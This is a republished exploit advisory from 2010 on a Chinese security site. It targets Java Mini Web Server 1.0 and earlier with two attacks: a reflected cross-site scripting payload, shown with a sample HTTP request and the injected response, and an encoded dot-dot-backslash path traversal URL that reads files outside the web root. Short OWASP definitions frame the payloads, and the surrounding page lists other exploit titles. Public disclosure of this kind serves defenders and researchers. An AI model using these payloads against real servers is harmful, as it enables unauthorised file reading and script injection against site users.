首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Java Mini Web Server <= 1.0 Path Traversal and Cross Site Scripting
来源:www.DigitalWhisper.co.il 作者:cp77fk4r 发布时间:2010-04-06  

# Exploit Title: Java Mini Web Server <= 1.0 Path Draversal & Cross Site Scripting.
# Date: 20/03/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com<http://gmail.com> | www.DigitalWhisper.co.il<http://www.DigitalWhisper.co.il>
# Software Link: http://www.jibble.org/miniwebserver/
# Version: <= 1.0
# Tested on: JRE build 1.6.0_17-b04
#
##[Cross Site Scripting]
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. (OWASP)
#
GET /%00">[YOUR_XSS_HERE]<"
#
#e.g:
-HTTP REQUEST:
GET %00"><font color=red>Work?</font><" HTTP/1.1
HOST: localhost
#
-HTTP RESPONSE (DATA):
<html><head><title>Index of %00"><font color=red>Work?</font><"/</title></head><body><h3>Index of %00"><font color=red>Work?</font><"/</h3><p>
<a href="%00"><font color=red>Work?</font><"/SimpleWebServer.jar">SimpleWebServer.jar</a> <br>
</p><hr><p>SimpleWebServer  http://www.jibble.org/</p></body><html>#
#
#
##[Path Traversal:]
A Path Traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. The attacker uses “../” sequences to move up to root directory, thus permitting navigation through the file system. (OWASP)
#
http://localhost/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c1.txt
("1.txt" located in the root directory on the volume)
#
#
[e0f]

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ZipScan 2.2c SEH
·Easy Ftp Server v1.7.0.2 MKD R
·Microsoft Internet Explorer Ta
·PHP 6.0 Dev str_transliterate(
·IncrediMail 2.0 ActiveX (Authe
·ZipCentral (.zip) 0day SEH Exp
·DSEmu 0.4.10 (.nds) Local Cras
·eZip Wizard 3.0 (.zip) SEH
·Dualis 20.4 (.bin) Local Danie
·MP3 Wav Editor v3.80 .mp3 Loca
·Zip Unzip v6 (.zip) 0day stack
·Portable AVS DVD Authoring v1.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved